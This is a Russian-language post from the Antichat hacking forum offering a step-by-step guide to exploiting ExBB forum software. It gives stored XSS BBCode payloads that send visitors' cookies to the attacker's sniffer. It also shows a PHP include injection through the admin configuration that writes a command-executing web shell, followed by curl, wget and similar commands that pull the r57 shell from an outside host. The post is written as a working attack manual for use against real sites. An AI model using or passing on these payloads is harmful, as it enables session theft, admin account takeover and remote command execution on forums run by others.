ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Exbb Анализ уязвимостей
  #1  
Старый 05.01.2007, 01:31
Аватар для N0n$e№Z
N0n$e№Z
Новичок
Регистрация: 27.11.2006
Сообщений: 17
Провел на форуме:
113057

Репутация: 13
По умолчанию Exbb Анализ уязвимостей

И так в этой статье я расскажу как использовать уязвимости в форумах ExBB

XSS:

Код:
[+email]'style='display:none;background:url(javascript:document.images[2].src="http://Ваш сниффер?"+document.cookie)[/email]
[+url="]"style='background:url(javascript:document. images[0].src="http://Ваш сниффер?"+document.cookie)'[/url]
Перед использованием удалить из строчек +

Это XSS уязвимости с помощью которых вы добудите Cookie,а уже с их помощью сможете узнать пароль админа!
Далее при заходе на страницу с этим постом вам на сниффер будут отправлены Cookie того или иного пользователя!Среди них может быть и админ!
Способ применения: Данные "Коды" нужно вставить в тело сообщения(Поста)! Для проверки их работоспособности можно нажать "Предварительный просмотр"!

Exploit's :

http://www.milw0rm.com/exploits/1713
http://www.milw0rm.com/exploits/1686


PHP-инклюдинг - (Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.)

Для того чтобы воспользоваться данной уязвимостью надо иметь доступ в Админ центр!

Зашли мы в админку:
1.Выбираем из столбца меню "Конфигурация".
2.Находим строчку URL вашей конференции
3.Там будет что-то вроде http://site/exbb/
4.Добавим в конец строчки '.@include('http://site/hackexbb.txt').'
5.Все
Объясню...
'.@include('http://здесь сайт на котором лежит файл >>>>hackexbb.txt').'

hackexbb.txt (Должен иметь содержимое со скриптом)

PHP код:
<?
$fp
=fopen("im/avatars/personal/shell.php""w");
fputs($fp,"<?
system(\$_GET['c']);
?>"
);
fclose($fp);
?>
Этот скрипт зальет в директорию im/avatars/personal/ простенькие шелл (shell.php) с помощью которого мы загрузим полноценный шелл!

Далее...

Все это примет вид - http://site/exbb/im/avatars/personal/shell.php

Чтобы воспользоваться коммандами делаем так в конец shell.php добавляем ?c=команда Т.Е. http://site/exbb/im/avatars/personal/shell.php?c=ls

Теперь о командах:
ls - просмотр файлов в данной директоии
pwd - просмотр пути до шелла.
uname - a - Имя ОС

Для заливки файлом используем команды:

curl --output im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

wget -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

get http://vrms.narod.ru/r57shell.php > /r57shell.php

links -source "http://vrms.narod.ru/r57shell.php" > im/avatars/personal/r57shell.php

lynx -source http://vrms.narod.ru/r57shell.php > im/avatars/personal/r57shell.php

fetch -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

И дальше r57 поможет вам во всем!!

Удачи!Данная статья не является пособием по взлому)))
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости 18 26.01.2007 16:21
СУБД Oracle подвержена новому классу уязвимостей Zek Мировые новости 0 28.11.2006 22:22
Google Code Search облегчит хакерам задачу по поиску уязвимостей Lany Мировые новости 4 16.10.2006 21:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ